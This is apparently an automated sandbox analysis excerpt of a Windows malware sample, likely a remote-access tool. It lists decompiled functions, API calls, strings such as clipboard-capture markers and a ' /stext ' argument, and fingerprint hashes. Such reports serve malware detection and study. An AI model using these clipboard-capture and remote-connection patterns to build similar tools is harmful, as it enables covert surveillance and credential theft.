                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                        Strings
                                        • [End of clipboard text], xrefs: 00406CB8
                                        • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                        • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                        • API String ID: 1191203583-3441917614
                                        • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                        • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                        • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                        • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402580, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66timethreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
				struct _SYSTEMTIME _v20;
				char _v36;
				void* _v52;
				char* _t25;
				char* _t26;
				intOrPtr _t35;
				void* _t37;

				_t37 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t35 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x41bcac; // 0x0
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_t25 =  &_a11;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
						_t26 =  &_v36;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
						printf(_t26);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				} else {
					 *((char*)(__ecx + 0x44)) = 1;
				}
				 *((char*)(_t37 + 0x38)) = 1;
				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
				CreateThread(0, 0, E004027A2, _t37, 0, 0);
				return 1;
			}










                                        0x00402588
                                        0x0040258f
                                        0x0040262f
                                        0x00000000
                                        0x0040262f
                                        0x00402599
                                        0x0040259c
                                        0x004025a4
                                        0x004025aa
                                        0x004025b0
                                        0x004025ce
                                        0x004025dc
                                        0x004025e3
                                        0x004025e7
                                        0x004025f1
                                        0x004025f8
                                        0x00402604
                                        0x0040260d
                                        0x0040260d
                                        0x0040259e
                                        0x0040259e
                                        0x0040259e
                                        0x0040261d
                                        0x00402621
                                        0x00402624
                                        0x00000000

                                        APIs
                                        • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                        • printf.MSVCRT ref: 004025F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                        • CreateThread.KERNEL32(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                        Strings
                                        • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                        • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                        • API String ID: 3715082883-586133315
                                        • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                        • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                        • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                        • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411A24, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                        • String ID: alarm.wav
                                        • API String ID: 3304909635-4094641389
                                        • Opcode ID: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                        • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                        • Opcode Fuzzy Hash: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                        • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004027B1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62sleeptimeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E004027B1(void* __ecx) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				void* _v56;
				char* _t29;
				char* _t30;
				void* _t38;
				intOrPtr _t46;

				_t38 = __ecx;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
					L3:
					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {
						_t46 =  *0x41bcac; // 0x0
						if(_t46 != 0) {
							GetLocalTime( &_v24);
							_t29 =  &_v5;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
							_t30 =  &_v40;
							L00414170();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
							_t21 = printf(_t30);
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						E004020F4(_t21, _t38);
					}
					L7:
					 *((char*)(_t38 + 0x38)) = 0;
					 *((char*)(_t38 + 0x39)) = 0;
					return 0;
				}
				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
					Sleep(0x3e8);
					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
					_t21 =  *(_t38 + 0x40);
					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
						continue;
					}
					goto L3;
				}
				goto L7;
			}











                                        0x004027b9
                                        0x004027c0
                                        0x004027c3
                                        0x004027e4
                                        0x004027e7
                                        0x004027e9
                                        0x004027ef
                                        0x004027f5
                                        0x00402812
                                        0x00402820
                                        0x00402827
                                        0x0040282b
                                        0x00402835
                                        0x0040283c
                                        0x00402848
                                        0x00402851
                                        0x00402851
                                        0x00402859
                                        0x00402859
                                        0x0040285e
                                        0x0040285e
                                        0x00402861
                                        0x00402869
                                        0x00402869
                                        0x004027c5
                                        0x004027d3
                                        0x004027d9
                                        0x004027dc
                                        0x004027e2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004027e2
                                        0x00000000

                                        APIs
                                        • Sleep.KERNEL32(000003E8), ref: 004027D3
                                        • GetLocalTime.KERNEL32(?), ref: 004027F5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 00402820
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040282B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402835
                                        • printf.MSVCRT ref: 0040283C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402848
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402851
                                        Strings
                                        • Timeout expired, resetting connection., xrefs: 00402815
                                        • %02i:%02i:%02i:%03i [WARNING] , xrefs: 0040281B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                        • API String ID: 2756237499-4159561219
                                        • Opcode ID: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                        • Instruction ID: eb574a52e8b17308bab00ba60a15c3ae4eff644db24cd51b069feea48370dafb
                                        • Opcode Fuzzy Hash: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                        • Instruction Fuzzy Hash: 95119372900758EFCB11EBA4D9898EFB7B9BB48301740447FFA42E3581E6B5A944C768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040AD6F, Relevance: 16.6, APIs: 11, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040AD91
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                          • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                          • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                        • String ID:
                                        • API String ID: 1795822965-0
                                        • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                        • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                        • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                        • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402149, Relevance: 16.6, APIs: 11, Instructions: 75networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                        • malloc.MSVCRT ref: 00402175
                                        • recv.WS2_32(0041BE70,00000000,00000000,00000000), ref: 00402186
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                          • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                          • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                          • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                          • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                          • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                          • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                          • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,69D65DF0), ref: 00402302
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                          • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                          • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                        • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
